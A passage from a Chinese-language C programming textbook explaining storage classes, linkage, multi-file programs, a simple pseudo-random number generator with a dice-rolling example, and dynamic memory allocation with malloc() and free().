条声明。这是运行时行为。第2条声明实际上并不是trystat()函数的一部分。 如果逐步调试该程序会发现,程序似乎跳过了这条声明。这是因为静态变量 和外部变量在程序被载入内存时已执行完毕。把这条声明放在trystat()函数 中是为了告诉编译器只有trystat()函数才能看到该变量。这条声明并未在运 行时执行。 不能在函数的形参中使用static: 876 int wontwork(static int flu); // 不允许 “局部静态变量”是描述具有块作用域的静态变量的另一个术语。阅读一 些老的 C文献时会发现,这种存储类别被称为内部静态存储类别(internal static storage class)。这里的内部指的是函数内部,而非内部链接。 12.1.7 外部链接的静态变量 外部链接的静态变量具有文件作用域、外部链接和静态存储期。该类别 有时称为外部存储类别(external storage class),属于该类别的变量称为外 部变量(external variable)。把变量的定义性声明(defining declaration)放 在在所有函数的外面便创建了外部变量。当然,为了指出该函数使用了外部 变量,可以在函数中用关键字extern再次声明。如果一个源代码文件使用的 外部变量定义在另一个源代码文件中,则必须用extern在该文件中声明该变 量。如下所示: int Errupt;        /* 外部定义的变量 */ double Up[100];      /* 外部定义的数组 */ extern char Coal;     /* 如果Coal被定义在另一个文件, */ /*则必须这样声明*/ void next(void); int main(void) { extern int Errupt;   /* 可选的声明*/ extern double Up[];  /* 可选的声明*/ ... 877 } void next(void) { ... } 注意,在main()中声明Up数组时(这是可选的声明)不用指明数组大 小,因为第1次声明已经提供了数组大小信息。main()中的两条 extern 声明完 全可以省略,因为外部变量具有文件作用域,所以Errupt和Up从声明处到文 件结尾都可见。它们出现在那里,仅为了说明main()函数要使用这两个变 量。 如果省略掉函数中的extern关键字,相当于创建了一个自动变量。去掉 下面声明中的extern: extern int Errupt; 便成为: int Errupt; 这使得编译器在 main()中创建了一个名为 Errupt 的自动变量。它是一个 独立的局部变量,与原来的外部变量Errupt不同。该局部变量仅main()中可 见,但是外部变量Errupt对于该文件的其他函数(如 next())也可见。简而 言之,在执行块中的语句时,块作用域中的变量将“隐藏”文件作用域中的同 名变量。如果不得已要使用与外部变量同名的局部变量,可以在局部变量的 声明中使用 auto 存储类别说明符明确表达这种意图。 外部变量具有静态存储期。因此,无论程序执行到main()、next()还是其 他函数,数组Up及其值都一直存在。 878 下面 3 个示例演示了外部和自动变量的一些使用情况。示例 1 中有一个 外部变量 Hocus。该变量对main()和magic()均可见。 /* 示例1 */ int Hocus; int magic(); int main(void) { extern int Hocus; // Hocus 之前已声明为外部变量 ... } int magic() { extern int Hocus; // 与上面的Hocus 是同一个变量 ... } 示例2中有一个外部变量Hocus,对两个函数均可见。这次,在默认情况 下对magic()可见。 /*示例2 */ int Hocus; int magic(); 879 int main(void) { extern int Hocus; // Hocus之前已声明为外部变量 ... } int magic() { //并未在该函数中声明Hocus,但是仍可使用该变量 ... } 在示例3中,创建了4个独立的变量。main()中的Hocus变量默认是自动 变量,属于main()私有。magic()中的Hocus变量被显式声明为自动,只有 magic()可用。外部变量Houcus对main()和magic()均不可见,但是对该文件中 未创建局部Hocus变量的其他函数可见。最后,Pocus是外部变量,magic()可 见,但是main()不可见,因为Pocus被声明在main()后面。 /* 示例 3 */ int Hocus; int magic(); int main(void) { 880 int Hocus; // 声明Hocus,默认是自动变量 ... } int Pocus; int magic() { auto int Hocus; //把局部变量Hocus显式声明为自动变量 ... } 这 3 个示例演示了外部变量的作用域是:从声明处到文件结尾。除此之 外,还说明了外部变量的生命期。外部变量Hocus和Pocus在程序运行中一直 存在,因为它们不受限于任何函数,不会在某个函数返回后就消失。 1.初始化外部变量 外部变量和自动变量类似,也可以被显式初始化。与自动变量不同的 是,如果未初始化外部变量,它们会被自动初始化为 0。这一原则也适用于 外部定义的数组元素。与自动变量的情况不同,只能使用常量表达式初始化 文件作用域变量: int x = 10;          // 没问题,10是常量 int y = 3 + 20;       // 没问题,用于初始化的是常量表达式 size_t z = sizeof(int);   //没问题,用于初始化的是常量表达式 int x2 = 2 * x;      // 不行,x是变量 881 (只要不是变长数组,sizeof表达式可被视为常量表达式。) 2.使用外部变量 下面来看一个使用外部变量的示例。假设有两个函数main()和critic(), 它们都要访问变量units。可以把units声明在这两个函数的上面,如程序清单 12.4所示(注意:该例的目的是演示外部变量的工作原理,并非它的典型用 法)。 程序清单12.4 global.c程序 /* global.c -- 使用外部变量 */ #include <stdio.h> int units = 0;    /* 外部变量 */ void critic(void); int main(void) { extern int units; /* 可选的重复声明 */ printf("How many pounds to a firkin of butter?\n"); scanf("%d", &units); while (units != 56) critic(); printf("You must have looked it up!\n"); return 0; 882 } void critic(void) { /* 删除了可选的重复声明 */ printf("No luck, my friend. Try again.\n"); scanf("%d", &units); } 下面是该程序的输出示例: How many pounds to a firkin of butter? 14 No luck, my friend. Try again. 56 You must have looked it up! 注意,critic()是如何读取 units的第2 个值的。当while循环结束时, main()也知道units的新值。所以main()函数和critic()都可以通过标识符units访 问相同的变量。用C的术语来描述是, units具有文件作用域、外部链接和静 态存储期。 把units定义在所有函数定义外面(即外部),units便是一个外部变量, 对units定义下面的所有函数均可见。因此,critics()可以直接使用units变量。 类似地,main()也可直接访问units。但是,main()中确实有如下声明: 883 extern int units; 本例中,以上声明主要是为了指出该函数要使用这个外部变量。存储类 别说明符extern告诉编译器,该函数中任何使用units的地方都引用同一个定 义在函数外部的变量。再次强调,main()和critic()使用的都是外部定义的 units。 3.外部名称 C99和C11标准都要求编译器识别局部标识符的前63个字符和外部标识 符的前31个字符。这修订了以前的标准,即编译器识别局部标识符前31个字 符和外部标识符前6个字符。你所用的编译器可能还执行以前的规则。外部 变量名比局部变量名的规则严格,是因为外部变量名还要遵循局部环境规 则,所受的限制更多。 4.定义和声明 下面进一步介绍定义变量和声明变量的区别。考虑下面的例子: int tern = 1; /* tern被定义 */ main() { extern int tern; /* 使用在别处定义的tern */ 这里,tern被声明了两次。第1次声明为变量预留了存储空间,该声明构 成了变量的定义。第2次声明只告诉编译器使用之前已创建的tern变量,所以 这不是定义。第1次声明被称为定义式声明(defining declaration),第2次声 明被称为引用式声明(referencing declaration)。关键字extern表明该声明不 是定义,因为它指示编译器去别处查询其定义。 假设这样写: 884 extern int tern; int main(void) { 编译器会假设 tern 实际的定义在该程序的别处,也许在别的文件中。该 声明并不会引起分配存储空间。因此,不要用关键字extern创建外部定义, 只用它来引用现有的外部定义。 外部变量只能初始化一次,且必须在定义该变量时进行。假设有下面的 代码: // file_one.c char permis = 'N'; ... // file_two.c extern char permis = 'Y'; /* 错误 */ file_two中的声明是错误的,因为file_one.c中的定义式声明已经创建并 初始化了permis。 12.1.8 内部链接的静态变量 该存储类别的变量具有静态存储期、文件作用域和内部链接。在所有函 数外部(这点与外部变量相同),用存储类别说明符static定义的变量具有 这种存储类别: static int svil = 1;  // 静态变量,内部链接 int main(void) 885 { 这种变量过去称为外部静态变量(external static variable),但是这个 术语有点自相矛盾(这些变量具有内部链接)。但是,没有合适的新简称, 所以只能用内部链接的静态变量(static variable with internal linkage)。普通 的外部变量可用于同一程序中任意文件中的函数,但是内部链接的静态变量 只能用于同一个文件中的函数。可以使用存储类别说明符 extern,在函数中 重复声明任何具有文件作用域的变量。这样的声明并不会改变其链接属性。 考虑下面的代码: int traveler = 1;      // 外部链接 static int stayhome = 1;  // 内部链接 int main() { extern int traveler;  // 使用定义在别处的 traveler extern int stayhome;  // 使用定义在别处的 stayhome ... 对于该程序所在的翻译单元,trveler和stayhome都具有文件作用域,但 是只有traveler可用于其他翻译单元(因为它具有外部链接)。这两个声明 都使用了extern关键字,指明了main()中使用的这两个变量的定义都在别处, 但是这并未改变stayhome的内部链接属性。 12.1.9 多文件 只有当程序由多个翻译单元组成时,才体现区别内部链接和外部链接的 重要性。接下来简要介绍一下。 复杂的C程序通常由多个单独的源代码文件组成。有时,这些文件可能 886 要共享一个外部变量。C通过在一个文件中进行定义式声明,然后在其他文 件中进行引用式声明来实现共享。也就是说,除了一个定义式声明外,其他 声明都要使用extern关键字。而且,只有定义式声明才能初始化变量。 注意,如果外部变量定义在一个文件中,那么其他文件在使用该变量之 前必须先声明它(用 extern关键字)。也就是说,在某文件中对外部变量进 行定义式声明只是单方面允许其他文件使用该变量,其他文件在用extern声 明之前不能直接使用它。 过去,不同的编译器遵循不同的规则。例如,许多 UNIX系统允许在多 个文件中不使用 extern 关键字声明变量,前提是只有一个带初始化的声明。 编译器会把文件中一个带初始化的声明视为该变量的定义。 12.1.10 存储类别说明符 读者可能已经注意到了,关键字static和extern的含义取决于上下文。C 语言有6个关键字作为存储类别说明符:auto、register、static、extern、 _Thread_local和typedef。typedef关键字与任何内存存储无关,把它归于此类 有一些语法上的原因。尤其是,在绝大多数情况下,不能在声明中使用多个 存储类别说明符,所以这意味着不能使用多个存储类别说明符作为typedef的 一部分。唯一例外的是_Thread_local,它可以和static或extern一起使用。 auto说明符表明变量是自动存储期,只能用于块作用域的变量声明中。 由于在块中声明的变量本身就具有自动存储期,所以使用auto主要是为了明 确表达要使用与外部变量同名的局部变量的意图。 register 说明符也只用于块作用域的变量,它把变量归为寄存器存储类 别,请求最快速度访问该变量。同时,还保护了该变量的地址不被获取。 用 static 说明符创建的对象具有静态存储期,载入程序时创建对象,当 程序结束时对象消失。如果static 用于文件作用域声明,作用域受限于该文 件。如果 static 用于块作用域声明,作用域则受限于该块。因此,只要程序 在运行对象就存在并保留其值,但是只有在执行块内的代码时,才能通过标 887 识符访问。块作用域的静态变量无链接。文件作用域的静态变量具有内部链 接。 extern 说明符表明声明的变量定义在别处。如果包含 extern 的声明具有 文件作用域,则引用的变量必须具有外部链接。如果包含 extern 的声明具有 块作用域,则引用的变量可能具有外部链接或内部链接,这接取决于该变量 的定义式声明。 小结:存储类别 自动变量具有块作用域、无链接、自动存储期。它们是局部变量,属于 其定义所在块(通常指函数)私有。寄存器变量的属性和自动变量相同,但 是编译器会使用更快的内存或寄存器储存它们。不能获取寄存器变量的地 址。 具有静态存储期的变量可以具有外部链接、内部链接或无链接。在同一 个文件所有函数的外部声明的变量是外部变量,具有文件作用域、外部链接 和静态存储期。如果在这种声明前面加上关键字static,那么其声明的变量 具有文件作用域、内部链接和静态存储期。如果在函数中用 static 声明一个 变量,则该变量具有块作用域、无链接、静态存储期。 具有自动存储期的变量,程序在进入该变量的声明所在块时才为其分配 内存,在退出该块时释放之前分配的内存。如果未初始化,自动变量中是垃 圾值。程序在编译时为具有静态存储期的变量分配内存,并在程序的运行过 程中一直保留这块内存。如果未初始化,这样的变量会被设置为0。 具有块作用域的变量是局部的,属于包含该声明的块私有。具有文件作 用域的变量对文件(或翻译单元)中位于其声明后面的所有函数可见。具有 外部链接的文件作用域变量,可用于该程序的其他翻译单元。具有内部链接 的文件作用域变量,只能用于其声明所在的文件内。 下面用一个简短的程序使用了5种存储类别。该程序包含两个文件(程 序清单12.5和程序清单12.6),所以必须使用多文件编译(参见第9章或参看 888 编译器的指导手册)。该示例仅为了让读者熟悉5种存储类别的用法,并不 是提供设计模型,好的设计可以不需要使用文件作用域变量。 程序清单12.5 parta.c程序 // parta.c --- 不同的存储类别 // 与 partb.c 一起编译 #include <stdio.h> void report_count(); void accumulate(int k); int count = 0;     // 文件作用域,外部链接 int main(void) { int value;     // 自动变量 register int i;  // 寄存器变量 printf("Enter a positive integer (0 to quit): "); while (scanf("%d", &value) == 1 && value > 0) { ++count;    // 使用文件作用域变量 for (i = value; i >= 0; i--) accumulate(i); 889 printf("Enter a positive integer (0 to quit): "); } report_count(); return 0; } void report_count() { printf("Loop executed %d times\n", count); } 程序清单12.6 partb.c程序 // partb.c -- 程序的其余部分 // 与 parta.c 一起编译 #include <stdio.h> extern int count;      // 引用式声明,外部链接 static int total = 0;    // 静态定义,内部链接 void accumulate(int k);   // 函数原型 void accumulate(int k)// k 具有块作用域,无链接 { static int subtotal = 0;  // 静态,无链接 890 if (k <= 0) { printf("loop cycle: %d\n", count); printf("subtotal: %d; total: %d\n", subtotal, total); subtotal = 0; } else { subtotal += k; total += k; } } 在该程序中,块作用域的静态变量subtotal统计每次while循环传入 accumulate()函数的总数,具有文件作用域、内部链接的变量 total 统计所有 传入 accumulate()函数的总数。当传入负值时, accumulate()函数报告total和 subtotal的值,并在报告后重置subtotal为0。由于parta.c调用了 accumulate()函 数,所以必须包含 accumulate()函数的原型。而 partb.c 只包含了accumulate() 函数的定义,并未在文件中调用该函数,所以其原型为可选(即省略原型也 不影响使用)。该函数使用了外部变量count 统计main()中的while循环迭代 的次数(顺带一提,对于该程序,没必要使用外部变量把 parta.c 和 partb.c 的代码弄得这么复杂)。在 parta.c 中,main()和report_count()共享count。 下面是程序的运行示例: 891 Enter a positive integer (0 to quit): 5 loop cycle: 1 subtotal: 15; total: 15 Enter a positive integer (0 to quit): 10 loop cycle: 2 subtotal: 55; total: 70 Enter a positive integer (0 to quit): 2 loop cycle: 3 subtotal: 3; total: 73 Enter a positive integer (0 to quit): 0 Loop executed 3 times 12.1.11 存储类别和函数 函数也有存储类别,可以是外部函数(默认)或静态函数。C99 新增了 第 3 种类别——内联函数,将在第16章中介绍。外部函数可以被其他文件的 函数访问,但是静态函数只能用于其定义所在的文件。假设一个文件中包含 了以下函数原型: double gamma(double);   /* 该函数默认为外部函数 */ static double beta(int, int); extern double delta(double, int); 在同一个程序中,其他文件中的函数可以调用gamma()和delta(),但是 892 不能调用beta(),因为以static存储类别说明符创建的函数属于特定模块私 有。这样做避免了名称冲突的问题,由于beta()受限于它所在的文件,所以 在其他文件中可以使用与之同名的函数。 通常的做法是:用 extern 关键字声明定义在其他文件中的函数。这样做 是为了表明当前文件中使用的函数被定义在别处。除非使用static关键字, 否则一般函数声明都默认为extern。 12.1.12 存储类别的选择 对于“使用哪种存储类别”的回答绝大多数是“自动存储类别”,要知道默 认类别就是自动存储类别。初学者会认为外部存储类别很不错,为何不把所 有的变量都设置成外部变量,这样就不必使用参数和指针在函数间传递信息 了。然而,这背后隐藏着一个陷阱。如果这样做,A()函数可能违背你的意 图,私下修改B()函数使用的变量。多年来,无数程序员的经验表明,随意 使用外部存储类别的变量导致的后果远远超过了它所带来的便利。 唯一例外的是const数据。因为它们在初始化后就不会被修改,所以不 用担心它们被意外篡改: const int DAYS = 7; const char * MSGS[3] = {"Yes", "No", Maybe"}; 保护性程序设计的黄金法则是:“按需知道”原则。尽量在函数内部解决 该函数的任务,只共享那些需要共享的变量。除自动存储类别外,其他存储 类别也很有用。不过,在使用某类别之前先要考虑一下是否有必要这样做。 893 12.2 随机数函数和静态变量 学习了不同存储类别的概念后,我们来看几个相关的程序。首先,来看 一个使用内部链接的静态变量的函数:随机数函数。ANSI C库提供了rand() 函数生成随机数。生成随机数有多种算法,ANSI C允许C实现针对特定机器 使用最佳算法。然而,ANSI C标准还提供了一个可移植的标准算法,在不 同系统中生成相同的随机数。实际上,rand()是“伪随机数生成器”,意思是 可预测生成数字的实际序列。但是,数字在其取值范围内均匀分布。 为了看清楚程序内部的情况,我们使用可移植的ANSI版本,而不是编 译器内置的rand()函数。可移植版本的方案开始于一个“种子”数字。该函数 使用该种子生成新的数,这个新数又成为新的种子。然后,新种子可用于生 成更新的种子,以此类推。该方案要行之有效,随机数函数必须记录它上一 次被调用时所使用的种子。这里需要一个静态变量。程序清单12.7演示了版 本0(稍后给出版本1)。 程序清单12.7 rand0.c函数文件 /* rand0.c --生成随机数*/ /* 使用 ANSI C 可移植算法 */ static unsigned long int next = 1; /* 种子 */ unsigned int rand0(void) { /* 生成伪随机数的魔术公式 */ next = next * 1103515245 + 12345; return (unsigned int) (next / 65536) % 32768; 894 } 在程序清单12.7中,静态变量next的初始值是1,其值在每次调用rand0() 函数时都会被修改(通过魔术公式)。该函数是用于返回一个0~32767之间 的值。注意,next是具有内部链接的静态变量(并非无链接)。这是为了方 便稍后扩展本例,供同一个文件中的其他函数共享。 程序清单12.8是测试rand0()函数的一个简单的驱动程序。 程序清单12.8 r_drive0.c驱动程序 /* r_drive0.c -- 测试 rand0()函数 */ /* 与 rand0.c 一起编译*/ #include <stdio.h> extern unsigned int rand0(void); int main(void) { int count; for (count = 0; count < 5; count++) printf("%d\n", rand0()); return 0; } 该程序也需要多文件编译。程序清单 12.7 和程序清单 12.8 分别使用一 个文件。程序清单 12.8 中的extern关键字提醒读者rand0()被定义在其他文件 中,在这个文件中不要求写出该函数原型。输出如下: 895 16838 5758 10113 17515 31051 程序输出的数字看上去是随机的,再次运行程序后,输出如下: 16838 5758 10113 17515 31051 看来,这两次的输出完全相同,这体现了“伪随机”的一个方面。每次主 程序运行,都开始于相同的种子1。可以引入另一个函数srand1()重置种子来 解决这个问题。关键是要让next成为只供rand1()和srand1()访问的内部链接静 态变量(srand1()相当于C库中的srand()函数)。把srand1()加入rand1()所在 的文件中。程序清单12.9给出了修改后的文件。 程序清单12.9 s_and_r.c文件程序 /* s_and_r.c -- 包含 rand1() 和 srand1() 的文件  */ /*       使用 ANSI C 可移植算法   */ static unsigned long int next = 1; /* 种子 */ 896 int rand1(void) { /*生成伪随机数的魔术公式*/ next = next * 1103515245 + 12345; return (unsigned int) (next / 65536) % 32768; } void srand1(unsigned int seed) { next = seed; } 注意,next是具有内部链接的文件作用域静态变量。这意味着rand1()和 srand1()都可以使用它,但是其他文件中的函数无法访问它。使用程序清单 12.10的驱动程序测试这两个函数。 程序清单12.10 r_drive1.c驱动程序 /* r_drive1.c -- 测试 rand1() 和 srand1() */ /* 与 s_and_r.c 一起编译 */ #include <stdio.h> #include <stdlib.h> extern void srand1(unsigned int x); extern int rand1(void); 897 int main(void) { int count; unsigned seed; printf("Please enter your choice for seed.\n"); while (scanf("%u", &seed) == 1) { srand1(seed);  /* 重置种子 */ for (count = 0; count < 5; count++) printf("%d\n", rand1()); printf("Please enter next seed (q to quit):\n"); } printf("Done\n"); return 0; } 编译两个文件,运行该程序后,其输出如下: 1 16838 5758 898 10113 17515 31051 Please enter next seed (q to quit): 513 20067 23475 8955 20841 15324 Please enter next seed (q to quit): q Done 设置seed的值为1,输出的结果与前面程序相同。但是设置seed的值为 513后就得到了新的结果。 注意 自动重置种子 如果 C 实现允许访问一些可变的量(如,时钟系统),可以用这些值 (可能会被截断)初始化种子值。例如,ANSI C有一个time()函数返回系统 时间。虽然时间单元因系统而异,但是重点是该返回值是一个可进行运算的 类型,而且其值随着时间变化而变化。time()返回值的类型名是time_t,具体 类型与系统有关。这没关系,我们可以使用强制类型转换: 899 #include <time.h> /* 提供time()的ANSI原型*/ srand1((unsigned int) time(0)); /* 初始化种子 */ 一般而言,time()接受的参数是一个 time_t 类型对象的地址,而时间值 就储存在传入的地址上。当然,也可以传入空指针(0)作为参数,这种情 况下,只能通过返回值机制来提供值。 可以把这个技巧应用于标准的ANSI C函数srand()和rand()中。如果使用 这些函数,要在文件中包含stdlib.c头文件。实际上,既然已经明白了 srand1()和rand1()如何使用内部链接的静态变量,你也可以使用编译器提供 的版本。我们将在下一个示例中这样做。 900 12.3 掷骰子 我们将要模拟一个非常流行的游戏——掷骰子。骰子的形式多种多样, 最普遍的是使用两个6面骰子。在一些冒险游戏中,会使用5种骰子:4面、6 面、8面、12面和20面。聪明的古希腊人证明了只有5种正多面体,它们的所 有面都具有相同的形状和大小。各种不同类型的骰子就是根据这些正多面体 发展而来。也可以做成其他面数的,但是其所有的面不会都相等,因此各个 面朝上的几率就不同。 计算机计算不用考虑几何的限制,所以可以设计任意面数的电子骰子。 我们先从6面开始。 我们想获得1~6的随机数。然而,rand()生成的随机数在0~ RAND_MAX之间。RAND_MAX被定义在stdlib.h中,其值通常是 INT_MAX。因此,需要进行一些调整,方法如下。 1.把随机数求模6,获得的整数在0~5之间。 2.结果加1,新值在1~6之间。 3.为方便以后扩展,把第1步中的数字6替换成骰子面数。 下面的代码实现了这3个步骤: #include <stdlib.h> /* 提供rand()的原型 */ int rollem(int sides) { int roll; roll = rand() % sides + 1; return roll; 901 } 我们还想用一个函数提示用户选择任意面数的骰子,并返回点数总和。 如程序清单12.11所示。 程序清单12.11 diceroll.c程序 /* diceroll.c -- 掷骰子模拟程序 */ /* 与 mandydice.c 一起编译 */ #include "diceroll.h" #include <stdio.h> #include <stdlib.h>      /* 提供库函数 rand()的原型 */ int roll_count = 0;      /* 外部链接 */ static int rollem(int sides)  /* 该函数属于该文件私有 */ { int roll; roll = rand() % sides + 1; ++roll_count;       /* 计算函数调用次数 */ return roll; } int roll_n_dice(int dice, int sides) { 902 int d; int total = 0; if (sides < 2) { printf("Need at least 2 sides.\n"); return -2; } if (dice < 1) { printf("Need at least 1 die.\n"); return -1; } for (d = 0; d < dice; d++) total += rollem(sides); return total; } 该文件加入了新元素。第一,rollem()函数属于该文件私有,它是 roll_n_dice()的辅助函数。第二,为了演示外部链接的特性,该文件声明了 一个外部变量roll_count。该变量统计调用rollem()函数的次数。这样设计有 点蹩脚,仅为了演示外部变量的特性。第三,该文件包含以下预处理指令: 903 #include "diceroll.h" 如果使用标准库函数,如 rand(),要在当前文件中包含标准头文件(对 rand()而言要包含stdlib.h),而不是声明该函数。因为头文件中已经包含了 正确的函数原型。我们效仿这一做法,把roll_n_dice()函数的原型放在 diceroll.h头文件中。把文件名放在双引号中而不是尖括号中,指示编译器在 本地查找文件,而不是到编译器存放标准头文件的位置去查找文件。“本地 查找”的含义取决于具体的实现。一些常见的实现把头文件与源代码文件或 工程文件(如果编译器使用它们的话)放在相同的目录或文件夹中。程序清 单12.12是头文件中的内容。 程序清单12.12 diceroll.h文件 //diceroll.h extern int roll_count; int roll_n_dice(int dice, int sides); 该头文件中包含一个函数原型和一个 extern 声明。由于 direroll.c 文件 包含了该文件, direroll.c实际上包含了roll_count的两个声明: extern int roll_count;   // 头文件中的声明(引用式声明) int roll_count = 0;     // 源代码文件中的声明(定义式声明) 这样做没问题。一个变量只能有一个定义式声明,但是带 extern 的声明 是引用式声明,可以有多个引用式声明。 使用 roll_n_dice()函数的程序都要包含 diceroll.c 头文件。包含该头文件 后,程序便可使用roll_n_dice()函数和roll_count变量。如程序清单12.13所 示。 程序清单12.13 manydice.c文件 904 /* manydice.c -- 多次掷骰子的模拟程序 */ /* 与 diceroll.c 一起编译*/ #include <stdio.h> #include <stdlib.h>    /* 为库函数 srand() 提供原型 */ #include <time.h>     /* 为 time() 提供原型      */ #include "diceroll.h"   /* 为roll_n_dice()提供原型,为roll_count变量 提供声明 */ int main(void) { int dice, roll; int sides; int status; srand((unsigned int) time(0)); /* 随机种子 */ printf("Enter the number of sides per die, 0 to stop.\n"); while (scanf("%d", &sides) == 1 && sides > 0) { printf("How many dice?\n"); if ((status = scanf("%d", &dice)) != 1) { 905 if (status == EOF) break;       /* 退出循环 */ else { printf("You should have entered an integer."); printf(" Let's begin again.\n"); while (getchar() != '\n') continue;   /* 处理错误的输入 */ printf("How many sides? Enter 0 to stop.\n"); continue;       /* 进入循环的下一轮迭代 */ } } roll = roll_n_dice(dice, sides); printf("You have rolled a %d using %d %d-sided dice.\n", roll, dice, sides); printf("How many sides? Enter 0 to stop.\n"); } printf("The rollem() function was called %d times.\n", roll_count);     /* 使用外部变量 */ 906 printf("GOOD FORTUNE TO YOU!\n"); return 0; } 要与包含程序清单12.11的文件一起编译该文件。可以把程序清单 12.11、12.12和12.13都放在同一文件夹或目录中。运行该程序,下面是一个 输出示例: Enter the number of sides per die, 0 to stop. 6 How many dice? 2 You have rolled a 12 using 2 6-sided dice. How many sides? Enter 0 to stop. 6 How many dice? 2 You have rolled a 4 using 2 6-sided dice. How many sides? Enter 0 to stop. 6 How many dice? 2 907 You have rolled a 5 using 2 6-sided dice. How many sides? Enter 0 to stop. 0 The rollem() function was called 6 times. GOOD FORTUNE TO YOU! 因为该程序使用了srand()随机生成随机数种子,所以大多数情况下,即 使输入相同也很难得到相同的输出。注意,manydice.c中的main()访问了定 义在diceroll.c中的roll_count变量。 有3种情况可以导致外层while循环结束:side小于1、输入类型不匹配 (此时scanf()返回0)、遇到文件结尾(返回值是EOF)。为了读取骰子的 点数,该程序处理文件结尾的方式(退出while循环)与处理类型不匹配 (进入循环的下一轮迭代)的情况不同。 可以通过多种方式使用roll_n_dice()。sides等于2时,程序模仿掷硬 币,“正面朝上”为2,“反面朝上”为1(或者反过来表示也行)。很容易修改 该程序单独显示点数的结果,或者构建一个骰子模拟器。如果要掷多次骰子 (如在一些角色扮演类游戏中),可以很容易地修改程序以输出类似的结 果: Enter the number of sets; enter q to stop. 18 How many sides and how many dice? 6 3 Here are 18 sets of 3 6-sided throws. 908 12 10 6 9 8 14 8 15 9 14 12 17 11 7 10 13 8 14 How many sets? Enter q to stop. q rand1()或 rand()(不是 rollem())还可以用来创建一个猜数字程序,让 计算机选定一个数字,你来猜。读者感兴趣的话可以自己编写这个程序。 909 12.4 分配内存:malloc()和free() 我们前面讨论的存储类别有一个共同之处:在确定用哪种存储类别后, 根据已制定好的内存管理规则,将自动选择其作用域和存储期。然而,还有 更灵活地选择,即用库函数分配和管理内存。 首先,回顾一下内存分配。所有程序都必须预留足够的内存来储存程序 使用的数据。这些内存中有些是自动分配的。例如,以下声明: float x; char place[] = "Dancing Oxen Creek"; 为一个float类型的值和一个字符串预留了足够的内存,或者可以显式指 定分配一定数量的内存: int plates[100]; 该声明预留了100个内存位置,每个位置都用于储存int类型的值。声明 还为内存提供了一个标识符。因此,可以使用x或place识别数据。回忆一 下,静态数据在程序载入内存时分配,而自动数据在程序执行块时分配,并 在程序离开该块时销毁。 C 能做的不止这些。可以在程序运行时分配更多的内存。主要的工具是 malloc()函数,该函数接受一个参数:所需的内存字节数。malloc()函数会找 到合适的空闲内存块,这样的内存是匿名的。也就是说, malloc()分配内 存,但是不会为其赋名。然而,它确实返回动态分配内存块的首字节地址。 因此,可以把该地址赋给一个指针变量,并使用指针访问这块内存。因为 char表示1字节,malloc()的返回类型通常被定义为指向char的指针。然而, 从ANSI C标准开始,C使用一个新的类型:指向void的指针。该类型相当于 一个“通用指针”。malloc()函数可用于返回指向数组的指针、指向结构的指 针等,所以通常该函数的返回值会被强制转换为匹配的类型。在ANSI C 中,应该坚持使用强制类型转换,提高代码的可读性。然而,把指向 void 910 的指针赋给任意类型的指针完全不用考虑类型匹配的问题。如果 malloc()分 配内存失败,将返回空指针。 我们试着用 malloc()创建一个数组。除了用 malloc()在程序运行时请求 一块内存,还需要一个指针记录这块内存的位置。例如,考虑下面的代码: double * ptd; ptd = (double *) malloc(30 * sizeof(double)); 以上代码为30个double类型的值请求内存空间,并设置ptd指向该位置。 注意,指针ptd被声明为指向一个double类型,而不是指向内含30个double类 型值的块。回忆一下,数组名是该数组首元素的地址。因此,如果让ptd指 向这个块的首元素,便可像使用数组名一样使用它。也就是说,可以使用表 达式ptd[0]访问该块的首元素,ptd[1]访问第2个元素,以此类推。根据前面 所学的知识,可以使用数组名来表示指针,也可以用指针来表示数组。 现在,我们有3种创建数组的方法。 声明数组时,用常量表达式表示数组的维度,用数组名访问数组的元 素。可以用静态内存或自动内存创建这种数组。 声明变长数组(C99新增的特性)时,用变量表达式表示数组的维度, 用数组名访问数组的元素。具有这种特性的数组只能在自动内存中创建。 声明一个指针,调用malloc(),将其返回值赋给指针,使用指针访问数 组的元素。该指针可以是静态的或自动的。 使用第2种和第3种方法可以创建动态数组(dynamic array)。这种数组 和普通数组不同,可以在程序运行时选择数组的大小和分配内存。例如,假 设n是一个整型变量。在C99之前,不能这样做: double item[n]; /* C99之前:n不允许是变量 */ 但是,可以这样做: 911 ptd = (double *) malloc(n * sizeof(double)); /* 可以 */ 如你所见,这比变长数组更灵活。 通常,malloc()要与free()配套使用。free()函数的参数是之前malloc()返 回的地址,该函数释放之前malloc()分配的内存。因此,动态分配内存的存 储期从调用malloc()分配内存到调用free()释放内存为止。设想malloc()和 free()管理着一个内存池。每次调用malloc()分配内存给程序使用,每次调用 free()把内存归还内存池中,这样便可重复使用这些内存。free()的参数应该 是一个指针,指向由 malloc()分配的一块内存。不能用 free()释放通过其他 方式(如,声明一个数组)分配的内存。malloc()和free()的原型都在stdlib.h 头文件中。 使用malloc(),程序可以在运行时才确定数组大小。如程序清单12.14所 示,它把内存块的地址赋给指针 ptd,然后便可以使用数组名的方式使用 ptd。另外,如果内存分配失败,可以调用 exit()函数结束程序,其原型在 stdlib.h中。EXIT_FAILURE的值也被定义在stdlib.h中。标准提供了两个返回 值以保证在所有操作系统中都能正常工作:EXIT_SUCCESS(或者,相当于 0)表示普通的程序结束, EXIT_FAILURE 表示程序异常中止。一些操作系 统(包括 UNIX、Linux 和 Windows)还接受一些表示其他运行错误的整数 值。 程序清单12.14 dyn_arr.c程序 /* dyn_arr.c -- 动态分配数组 */ #include <stdio.h> #include <stdlib.h> /* 为 malloc()、free()提供原型 */ int main(void) { 912 double * ptd; int max; int number; int i = 0; puts("What is the maximum number of type double entries?"); if (scanf("%d", &max) != 1) { puts("Number not correctly entered -- bye."); exit(EXIT_FAILURE); } ptd = (double *) malloc(max * sizeof(double)); if (ptd == NULL) { puts("Memory allocation failed. Goodbye."); exit(EXIT_FAILURE); } /* ptd 现在指向有max个元素的数组 */ puts("Enter the values (q to quit):"); while (i < max && scanf("%lf", &ptd[i]) == 1) 913 ++i; printf("Here are your %d entries:\n", number = i); for (i = 0; i < number; i++) { printf("%7.2f ", ptd[i]); if (i % 7 == 6) putchar('\n'); } if (i % 7 != 0) putchar('\n'); puts("Done."); free(ptd); return 0; } 下面是该程序的运行示例。程序通过交互的方式让用户先确定数组的大 小,我们设置数组大小为 5。虽然我们后来输入了6个数,但程序也只处理 前5个数。 What is the maximum number of entries? 5 Enter the values (q to quit): 914 20 30 35 25 40 80 Here are your 5 entries: 20.00 30.00 35.00 25.00 40.00 Done. 该程序通过以下代码获取数组的大小: if (scanf("%d", &max) != 1) { puts("Number not correctly entered -- bye."); exit(EXIT_FAILURE); } 接下来,分配足够的内存空间以储存用户要存入的所有数,然后把动态 分配的内存地址赋给指针ptd: ptd 